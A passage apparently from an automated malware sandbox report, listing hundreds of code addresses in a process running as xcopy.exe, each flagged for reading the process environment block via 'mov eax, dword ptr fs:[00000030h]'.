        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398437C mov eax, dword ptr fs:[00000030h]22_2_0398437C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F367 mov eax, dword ptr fs:[00000030h]22_2_0399F367
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7370 mov eax, dword ptr fs:[00000030h]22_2_038E7370
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7370 mov eax, dword ptr fs:[00000030h]22_2_038E7370
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7370 mov eax, dword ptr fs:[00000030h]22_2_038E7370
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391329E mov eax, dword ptr fs:[00000030h]22_2_0391329E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391329E mov eax, dword ptr fs:[00000030h]22_2_0391329E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03960283 mov eax, dword ptr fs:[00000030h]22_2_03960283
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03960283 mov eax, dword ptr fs:[00000030h]22_2_03960283
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03960283 mov eax, dword ptr fs:[00000030h]22_2_03960283
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391E284 mov eax, dword ptr fs:[00000030h]22_2_0391E284
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391E284 mov eax, dword ptr fs:[00000030h]22_2_0391E284
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5283 mov eax, dword ptr fs:[00000030h]22_2_039B5283
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039692BC mov eax, dword ptr fs:[00000030h]22_2_039692BC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039692BC mov eax, dword ptr fs:[00000030h]22_2_039692BC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039692BC mov ecx, dword ptr fs:[00000030h]22_2_039692BC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039692BC mov ecx, dword ptr fs:[00000030h]22_2_039692BC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F52A0 mov eax, dword ptr fs:[00000030h]22_2_038F52A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F52A0 mov eax, dword ptr fs:[00000030h]22_2_038F52A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F52A0 mov eax, dword ptr fs:[00000030h]22_2_038F52A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F52A0 mov eax, dword ptr fs:[00000030h]22_2_038F52A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov eax, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov ecx, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov eax, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov eax, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov eax, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov eax, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039772A0 mov eax, dword ptr fs:[00000030h]22_2_039772A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039772A0 mov eax, dword ptr fs:[00000030h]22_2_039772A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A92A6 mov eax, dword ptr fs:[00000030h]22_2_039A92A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A92A6 mov eax, dword ptr fs:[00000030h]22_2_039A92A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A92A6 mov eax, dword ptr fs:[00000030h]22_2_039A92A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A92A6 mov eax, dword ptr fs:[00000030h]22_2_039A92A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390F2D0 mov eax, dword ptr fs:[00000030h]22_2_0390F2D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390F2D0 mov eax, dword ptr fs:[00000030h]22_2_0390F2D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E92C5 mov eax, dword ptr fs:[00000030h]22_2_038E92C5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E92C5 mov eax, dword ptr fs:[00000030h]22_2_038E92C5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA2C3 mov eax, dword ptr fs:[00000030h]22_2_038EA2C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA2C3 mov eax, dword ptr fs:[00000030h]22_2_038EA2C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA2C3 mov eax, dword ptr fs:[00000030h]22_2_038EA2C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA2C3 mov eax, dword ptr fs:[00000030h]22_2_038EA2C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA2C3 mov eax, dword ptr fs:[00000030h]22_2_038EA2C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB2D3 mov eax, dword ptr fs:[00000030h]22_2_038DB2D3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB2D3 mov eax, dword ptr fs:[00000030h]22_2_038DB2D3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB2D3 mov eax, dword ptr fs:[00000030h]22_2_038DB2D3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F2F8 mov eax, dword ptr fs:[00000030h]22_2_0399F2F8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F02E1 mov eax, dword ptr fs:[00000030h]22_2_038F02E1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F02E1 mov eax, dword ptr fs:[00000030h]22_2_038F02E1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F02E1 mov eax, dword ptr fs:[00000030h]22_2_038F02E1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D92FF mov eax, dword ptr fs:[00000030h]22_2_038D92FF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B52E2 mov eax, dword ptr fs:[00000030h]22_2_039B52E2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03917208 mov eax, dword ptr fs:[00000030h]22_2_03917208
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03917208 mov eax, dword ptr fs:[00000030h]22_2_03917208
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D823B mov eax, dword ptr fs:[00000030h]22_2_038D823B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5227 mov eax, dword ptr fs:[00000030h]22_2_039B5227
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9240 mov eax, dword ptr fs:[00000030h]22_2_038D9240
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9240 mov eax, dword ptr fs:[00000030h]22_2_038D9240
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399B256 mov eax, dword ptr fs:[00000030h]22_2_0399B256
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399B256 mov eax, dword ptr fs:[00000030h]22_2_0399B256
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03968243 mov eax, dword ptr fs:[00000030h]22_2_03968243
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03968243 mov ecx, dword ptr fs:[00000030h]22_2_03968243
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E6259 mov eax, dword ptr fs:[00000030h]22_2_038E6259
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391724D mov eax, dword ptr fs:[00000030h]22_2_0391724D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA250 mov eax, dword ptr fs:[00000030h]22_2_038DA250
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03921270 mov eax, dword ptr fs:[00000030h]22_2_03921270
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03921270 mov eax, dword ptr fs:[00000030h]22_2_03921270
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03909274 mov eax, dword ptr fs:[00000030h]22_2_03909274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D826B mov eax, dword ptr fs:[00000030h]22_2_038D826B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4260 mov eax, dword ptr fs:[00000030h]22_2_038E4260
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4260 mov eax, dword ptr fs:[00000030h]22_2_038E4260
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4260 mov eax, dword ptr fs:[00000030h]22_2_038E4260
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AD26B mov eax, dword ptr fs:[00000030h]22_2_039AD26B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AD26B mov eax, dword ptr fs:[00000030h]22_2_039AD26B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03937190 mov eax, dword ptr fs:[00000030h]22_2_03937190
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396019F mov eax, dword ptr fs:[00000030h]22_2_0396019F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396019F mov eax, dword ptr fs:[00000030h]22_2_0396019F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396019F mov eax, dword ptr fs:[00000030h]22_2_0396019F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396019F mov eax, dword ptr fs:[00000030h]22_2_0396019F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399C188 mov eax, dword ptr fs:[00000030h]22_2_0399C188
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399C188 mov eax, dword ptr fs:[00000030h]22_2_0399C188
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03920185 mov eax, dword ptr fs:[00000030h]22_2_03920185
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA197 mov eax, dword ptr fs:[00000030h]22_2_038DA197
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA197 mov eax, dword ptr fs:[00000030h]22_2_038DA197
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA197 mov eax, dword ptr fs:[00000030h]22_2_038DA197
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039911A4 mov eax, dword ptr fs:[00000030h]22_2_039911A4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039911A4 mov eax, dword ptr fs:[00000030h]22_2_039911A4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039911A4 mov eax, dword ptr fs:[00000030h]22_2_039911A4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039911A4 mov eax, dword ptr fs:[00000030h]22_2_039911A4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FB1B0 mov eax, dword ptr fs:[00000030h]22_2_038FB1B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391D1D0 mov eax, dword ptr fs:[00000030h]22_2_0391D1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391D1D0 mov ecx, dword ptr fs:[00000030h]22_2_0391D1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov eax, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov eax, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov ecx, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov eax, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov eax, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B51CB mov eax, dword ptr fs:[00000030h]22_2_039B51CB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A61C3 mov eax, dword ptr fs:[00000030h]22_2_039A61C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A61C3 mov eax, dword ptr fs:[00000030h]22_2_039A61C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039871F9 mov esi, dword ptr fs:[00000030h]22_2_039871F9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E51ED mov eax, dword ptr fs:[00000030h]22_2_038E51ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039101F8 mov eax, dword ptr fs:[00000030h]22_2_039101F8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B61E5 mov eax, dword ptr fs:[00000030h]22_2_039B61E5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A118 mov ecx, dword ptr fs:[00000030h]22_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A118 mov eax, dword ptr fs:[00000030h]22_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A118 mov eax, dword ptr fs:[00000030h]22_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A118 mov eax, dword ptr fs:[00000030h]22_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A0115 mov eax, dword ptr fs:[00000030h]22_2_039A0115
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03910124 mov eax, dword ptr fs:[00000030h]22_2_03910124
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB136 mov eax, dword ptr fs:[00000030h]22_2_038DB136
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB136 mov eax, dword ptr fs:[00000030h]22_2_038DB136
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB136 mov eax, dword ptr fs:[00000030h]22_2_038DB136
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB136 mov eax, dword ptr fs:[00000030h]22_2_038DB136
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E1131 mov eax, dword ptr fs:[00000030h]22_2_038E1131
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E1131 mov eax, dword ptr fs:[00000030h]22_2_038E1131
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9148 mov eax, dword ptr fs:[00000030h]22_2_038D9148
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9148 mov eax, dword ptr fs:[00000030h]22_2_038D9148
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9148 mov eax, dword ptr fs:[00000030h]22_2_038D9148
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9148 mov eax, dword ptr fs:[00000030h]22_2_038D9148
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5152 mov eax, dword ptr fs:[00000030h]22_2_039B5152
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03978158 mov eax, dword ptr fs:[00000030h]22_2_03978158
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov eax, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov eax, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov ecx, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov eax, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov eax, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E6154 mov eax, dword ptr fs:[00000030h]22_2_038E6154
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E6154 mov eax, dword ptr fs:[00000030h]22_2_038E6154
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC156 mov eax, dword ptr fs:[00000030h]22_2_038DC156
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7152 mov eax, dword ptr fs:[00000030h]22_2_038E7152
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03979179 mov eax, dword ptr fs:[00000030h]22_2_03979179
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD08D mov eax, dword ptr fs:[00000030h]22_2_038DD08D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D090 mov eax, dword ptr fs:[00000030h]22_2_0390D090
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D090 mov eax, dword ptr fs:[00000030h]22_2_0390D090
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E208A mov eax, dword ptr fs:[00000030h]22_2_038E208A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391909C mov eax, dword ptr fs:[00000030h]22_2_0391909C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E5096 mov eax, dword ptr fs:[00000030h]22_2_038E5096
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A60B8 mov eax, dword ptr fs:[00000030h]22_2_039A60B8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A60B8 mov ecx, dword ptr fs:[00000030h]22_2_039A60B8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039780A8 mov eax, dword ptr fs:[00000030h]22_2_039780A8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B50D9 mov eax, dword ptr fs:[00000030h]22_2_039B50D9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039620DE mov eax, dword ptr fs:[00000030h]22_2_039620DE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039090DB mov eax, dword ptr fs:[00000030h]22_2_039090DB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov ecx, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov ecx, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov ecx, dword ptr fs:[00000030h]22_2_038F70C0
